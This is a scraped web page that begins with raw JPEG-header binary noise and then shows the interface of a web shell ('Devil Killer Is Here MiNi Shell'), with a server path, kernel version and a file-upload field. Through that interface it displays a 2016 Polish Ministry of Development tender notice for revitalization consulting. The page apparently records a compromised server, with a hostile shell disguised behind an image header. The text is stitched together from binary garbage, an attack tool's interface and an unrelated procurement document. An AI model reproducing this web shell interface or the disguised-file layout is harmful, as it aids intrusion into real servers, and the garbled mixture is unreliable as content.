JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161205/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161205/359130-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://mr.bip.gov.pl' target='_blank'>http://mr.bip.gov.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 359130 - 2016
              z dnia 2016-12-05 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Warszawa: Świadczenie usług doradztwa eksperckiego w zakresie dotyczącym prac nad zagadnieniami rewitalizacji polskich gmin<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                tak
              </div><br /><b>Nazwa projektu lub programu</b><br />Program Operacyjny Pomoc Techniczna </div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Ministerstwo Rozwoju, krajowy numer identyfikacyjny
              14031558300000, ul.
              Plac Trzech Krzyży 
              3,
              00507  
              Warszawa, woj.
              mazowieckie, państwo
              Polska, tel.
              22 273 71 50, e-mail
              zamowienia@mr.gov.pl, faks
              22 273 89 22.
              <br />
              Adres strony internetowej (URL): mr.gov.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja rządowa centralna
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />mr.bip.gov.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Pisemnie, zgodnie z zasadami określonymi w Rozdziale 7 SIWZ<br />
                Adres:
                <br /></div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Świadczenie usług doradztwa eksperckiego w zakresie dotyczącym prac nad zagadnieniami rewitalizacji polskich gmin<br /><b>Numer referencyjny: </b>BDG-V.2611.8.2016.MR<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiotem zamówienia jest świadczenie usług doradztwa w zakresie dotyczącym prac nad zagadnieniami rewitalizacji polskich miast<br /><br /><b>II.5) Główny kod CPV: </b>85312320-8<br /><b> Dodatkowe kody CPV:</b>71241000-9<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                tak
                <br />
                Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp:
                Zamawiający przewiduje możliwość
udzielenia zamówienia, o którym mowa w art. 67 ust. 1 pkt 6 ustawy.
Zamówienie to będzie polegało na powtórzeniu usług, o których mowa w Szczegółowym Opisie Przedmiotu
Zamówienia (Załącznik nr 1 do SIWZ).<br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 31/12/2018<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie stawia warunku w ww. zakresie.<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający nie stawia warunku w ww. zakresie.<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Zamawiający uzna ww. warunek za spełniony jeżeli wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie), należycie wykonał 2 (dwie) usługi doradcze z zakresu rewitalizacji zdegradowanych obszarów zurbanizowanych. Wartość każdej z usług wynosiła co najmniej 50 000 zł brutto.
Zamawiający uzna ww. warunek za spełniony, jeżeli wykonawca wykaże, że dysponuje lub  
będzie dysponował co najmniej 12 osobami wykonującymi zamówienie, w tym:

1)	zespołem co najmniej 7 osób, z zastrzeżeniem, że każda z osób przygotowywała lub świadczyła usługi doradcze przy przygotowaniu programu rewitalizacji (przez program rewitalizacji zamawiający rozumie dokument przygotowany na poziomie gminy i przyjmowany uchwałą rady gminy) i uczestniczyła we wdrażaniu programu rewitalizacji, w tym:

a)	co najmniej 3 osoby mające doświadczenie jako osoby wiodące (tj. kierownik lub koordynator lub wiodący specjalista) we wdrażaniu programu rewitalizacji;

b) co najmniej 3 osoby będące autorem lub współautorem pięciu publikacji dotyczących rewitalizacji, opublikowanych w ciągu ostatnich 10 lat przed upływem terminu składania ofert;

c) 	co najmniej 4 osoby, które w okresie ostatnich 3 lat przed upływem terminu składania ofert, poprowadziły co najmniej jedne zajęcia (np. warsztaty, szkolenia, wykłady, prelekcje, wystąpienia, np. podczas konferencji, itp.) związane z tematyką rewitalizacji.

Warunki, o których mowa w pkt 1 lit. a)  c) można łączyć.



2)	zespołem co najmniej 5 osób, w tym:

a)	co najmniej dwiema osobami, z których każda, w aspekcie mieszkalnictwa, przygotowywała lub świadczyła usługi doradcze przy przygotowaniu co najmniej jednego programu rewitalizacji  jej działania dotyczyły np. zasobów mieszkaniowych, instrumentów finansowych i organizacyjnych dotyczących wspierania remontów lub modernizacji zasobów mieszkaniowych (zespół tematyczny: mieszkalnictwo); Spośród tych osób:

- co najmniej jedna osoba jest autorem lub współautorem co najmniej dwóch analiz lub ekspertyz lub badań lub opracowań z zakresu rewitalizacji (tzn. twórcą całych lub przynajmniej części dokumentów); 
- co najmniej jedna osoba uczestniczyła we wdrożeniu programu rewitalizacji;
- co najmniej jedna osoba posiada doświadczenie w prowadzeniu zajęć (np. warsztaty, szkolenia, wykłady, prelekcje, wystąpienia, np. podczas konferencji, itp.). Warunek ten zostanie uznany za spełniony, jeśli osoba ta w okresie ostatnich 3 lat przed upływem terminu składania ofert, poprowadziła co najmniej jedne zajęcia związane z tematyką rewitalizacji.
b) co najmniej dwiema osobami, z których każda posiada wykształcenie wyższe ekonomiczne, jest autorem lub współautorem co najmniej jednego wieloletniego planu inwestycyjnego JST lub co najmniej jednej wieloletniej prognozy finansowej/planu finansowego JST lub budżetu JST (zespół tematyczny: finanse samorządu). Spośród tych osób co najmniej jedna osoba posiada doświadczenie w prowadzeniu zajęć (np. warsztaty, szkolenia, wykłady, prelekcje, wystąpienia, np. podczas konferencji, itp.). Warunek ten zostanie uznany za spełniony, jeśli osoba ta w okresie ostatnich 3 lat przed upływem terminu składania ofert, poprowadziła co najmniej jedne tego typu zajęcia. 
c) co najmniej dwiema osobami, z których każda posiada wykształcenie wyższe prawnicze, uczestniczyła w tworzeniu co najmniej jednego projektu aktu prawa miejscowego oraz przygotowywała dla JST co najmniej jedną umowę z zakresu prawa cywilnego (zespół tematyczny: prawo); Spośród tych osób co najmniej jedna osoba posiada doświadczenie w prowadzeniu zajęć (np. warsztaty, szkolenia, wykłady, prelekcje, wystąpienia, np. podczas konferencji, itp.). Warunek ten zostanie uznany za spełniony, jeśli osoba ta w okresie ostatnich 3 lat przed upływem terminu składania ofert, poprowadziła co najmniej jedne tego typu zajęcia. 
d) co najmniej dwiema osobami, z których każda przygotowywała lub świadczyła usługi doradcze przy przygotowaniu lub w prowadzeniu działań z zakresu partycypacji społecznej w rewitalizacji (zespół tematyczny: partycypacja społeczna); Spośród tych osób:
- co najmniej jedna osoba jest autorem lub współautorem co najmniej dwóch analiz lub ekspertyz lub badań lub opracowań z zakresu rewitalizacji (tzn. twórcą całych lub przynajmniej części dokumentów); 
- co najmniej jedna osoba uczestniczyła we wdrożeniu programu rewitalizacji;
- co najmniej jedna osoba posiada doświadczenie w prowadzeniu zajęć (np. warsztaty, szkolenia, wykłady, prelekcje, wystąpienia, np. podczas konferencji, itp.). Warunek ten zostanie uznany za spełniony, jeśli osoba ta w okresie ostatnich 3 lat przed upływem terminu składania ofert, poprowadziła co najmniej jedne zajęcia związane z tematyką rewitalizacji.
e) co najmniej dwiema osobami, z których każda w procesie rewitalizacji prowadziła działania mające na celu zapewnienie finansowania tego procesu (jej działania dotyczyły np. tworzenia modeli ekonomicznych przedsięwzięć inwestycyjnych, partnerstwa publiczno-prywatnego, sposobów zaangażowania sektora prywatnego w rewitalizację) (zespół tematyczny: ekonomia). Spośród tych osób:
- co najmniej jedna osoba przygotowywała lub świadczyła usługi doradcze przy przygotowaniu co najmniej jednego programu rewitalizacji uwzględniającego działania z zakresu aktywizacji gospodarczej  projektowania rozwiązań nakierowanych na rozwój gospodarczy obszarów rewitalizowanych;
- co najmniej jedna osoba jest autorem lub współautorem co najmniej dwóch analiz lub ekspertyz lub badań lub opracowań z zakresu rewitalizacji (tzn. twórcą całych lub przynajmniej części dokumentów); 
- co najmniej jedna osoba uczestniczyła we wdrożeniu programu rewitalizacji;
- co najmniej jedna osoba posiada doświadczenie w prowadzeniu zajęć (np. warsztaty, szkolenia, wykłady, prelekcje, wystąpienia, np. podczas konferencji, itp.). Warunek ten zostanie uznany za spełniony, jeśli osoba ta w okresie ostatnich 3 lat przed upływem terminu składania ofert, poprowadziła co najmniej jedne zajęcia związane z tematyką rewitalizacji.
f) co najmniej dwiema osobami, z których każda, w aspekcie budownictwa lub efektywności energetycznej, przygotowywała lub świadczyła usługi doradcze przy przygotowaniu co najmniej jednego programu rewitalizacji (zespół tematyczny: budownictwo i efektywność energetyczna). Spośród tych osób:
- co najmniej jedna osoba jest autorem lub współautorem co najmniej dwóch analiz lub ekspertyz lub badań lub opracowań z zakresu rewitalizacji (tzn. twórcą całych lub przynajmniej części dokumentów); 
- co najmniej jedna osoba uczestniczyła we wdrożeniu programu rewitalizacji;
- co najmniej jedna osoba posiada doświadczenie w prowadzeniu zajęć (np. warsztaty, szkolenia, wykłady, prelekcje, wystąpienia, np. podczas konferencji, itp.). Warunek ten zostanie uznany za spełniony, jeśli osoba ta w okresie ostatnich 3 lat przed upływem terminu składania ofert, poprowadziła co najmniej jedne zajęcia związane z tematyką rewitalizacji.
g) co najmniej dwiema osobami, z których każda przygotowywała lub świadczyła usługi doradcze przy tworzeniu co najmniej jednego miejscowego planu zagospodarowania przestrzennego obejmującego także obszar objęty działaniami rewitalizacyjnymi  (zespół tematyczny: planowanie i zagospodarowanie przestrzenne). Spośród tych osób co najmniej jedna osoba posiada doświadczenie w prowadzeniu zajęć (np. warsztaty, szkolenia, wykłady, prelekcje, wystąpienia, np. podczas konferencji, itp.). Warunek ten zostanie uznany za spełniony, jeśli osoba ta w okresie ostatnich 3 lat przed upływem terminu składania ofert, poprowadziła co najmniej jedne zajęcia związane z tematyką rewitalizacji.
h) co najmniej dwiema osobami, z których każda, w aspekcie polityki społecznej, przygotowywała lub świadczyła usługi doradcze przy przygotowaniu co najmniej jednego programu rewitalizacji  jej działania dotyczyły np. opieki społecznej, przeciwdziałania wykluczeniu, aktywizacji społecznej, ekonomii społecznej lub wspierania przedsiębiorczości (zespół tematyczny: polityka społeczna i aktywizacja społeczna); Spośród tych osób:
- co najmniej jedna osoba jest autorem lub współautorem co najmniej dwóch analiz lub ekspertyz lub badań lub opracowań z zakresu rewitalizacji (tzn. twórcą całych lub przynajmniej części dokumentów); 
- co najmniej jedna osoba uczestniczyła we wdrożeniu programu rewitalizacji;
- co najmniej jedna osoba posiada doświadczenie w prowadzeniu zajęć (np. warsztaty, szkolenia, wykłady, prelekcje, wystąpienia, np. podczas konferencji, itp.). Warunek ten zostanie uznany za spełniony, jeśli osoba ta w okresie ostatnich 3 lat przed upływem terminu składania ofert, poprowadziła co najmniej jedne zajęcia związane z tematyką rewitalizacji.
i) co najmniej dwiema osobami, z których każda, w aspekcie ochrony środowiska, przygotowywała lub świadczyła usługi doradcze przy przygotowaniu co najmniej jednego programu rewitalizacji (zespół tematyczny: ochrona środowiska). Spośród tych osób:
- co najmniej jedna osoba jest autorem lub współautorem co najmniej dwóch analiz lub ekspertyz lub badań lub opracowań z zakresu rewitalizacji (tzn. twórcą całych lub przynajmniej części dokumentów); 
- co najmniej jedna osoba uczestniczyła we wdrożeniu programu rewitalizacji;
- co najmniej jedna osoba posiada doświadczenie w prowadzeniu zajęć (np. warsztaty, szkolenia, wykłady, prelekcje, wystąpienia, np. podczas konferencji, itp.). Warunek ten zostanie uznany za spełniony, jeśli osoba ta w okresie ostatnich 3 lat przed upływem terminu składania ofert, poprowadziła co najmniej jedne zajęcia związane z tematyką rewitalizacji.
j) co najmniej dwiema osobami, z których każda, w aspekcie dziedzictwa narodowego i architektury, przygotowywała lub świadczyła usługi doradcze przy przygotowaniu co najmniej jednego programu rewitalizacji obejmującego co najmniej jeden obiekt budowlany wpisany do rejestru zabytków lub położony na obszarze objętym ochroną konserwatorską (zespół tematyczny: zabytki i dziedzictwo narodowe); Spośród tych osób:
- co najmniej jedna osoba jest autorem lub współautorem co najmniej dwóch analiz lub ekspertyz lub badań lub opracowań z zakresu rewitalizacji (tzn. twórcą całych lub przynajmniej części dokumentów);;
- co najmniej jedna osoba uczestniczyła we wdrożeniu programu rewitalizacji;
k) co najmniej dwiema osobami, z których każda, w aspekcie działań kulturalnych na obszarze rewitalizowanym, przygotowywała lub świadczyła usługi doradcze przy przygotowaniu co najmniej jednego programu rewitalizacji (zespół tematyczny: kultura). Spośród tych osób:
- co najmniej jedna osoba jest autorem lub współautorem co najmniej dwóch analiz lub ekspertyz lub badań lub opracowań z zakresu rewitalizacji (tzn. twórcą całych lub przynajmniej części dokumentów);
- co najmniej jedna osoba uczestniczyła we wdrożeniu programu rewitalizacji;
- co najmniej jedna osoba posiada doświadczenie w prowadzeniu zajęć (np. warsztaty, szkolenia, wykłady, prelekcje, wystąpienia, np. podczas konferencji, itp.). Warunek ten zostanie uznany za spełniony, jeśli osoba ta w okresie ostatnich 3 lat przed upływem terminu składania ofert, poprowadziła co najmniej jedne zajęcia związane z tematyką rewitalizacji.
Warunki, o których mowa w pkt 2 lit. a)  k) można łączyć.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">a)odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy;
b)dokumenty dotyczące podmiotu trzeciego, w celu wykazania braku istnienia wobec niego podstaw wykluczenia oraz spełnienia, w zakresie, w jakim wykonawca powołuje się na jego zasoby, warunków udziału w postępowaniu  jeżeli wykonawca polega na zasobach podmiotu trzeciego
c) Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt a) składa dokument lub dokumenty wystawione
w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt a)zastępuje się je dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy lub miejsce zamieszkania tej osoby. Terminy określone w pkt c) stosuje się.
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1)wykaz usług wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów, określających czy te usługi zostały wykonane lub są wykonywane należycie, sporządzonego zgodnie z Załącznikiem nr 6 do SIWZ;
2) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia, 
w szczególności odpowiedzialnych za świadczenie usług  wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami, sporządzonego zgodnie z Załącznikiem nr 7 do SIWZ;
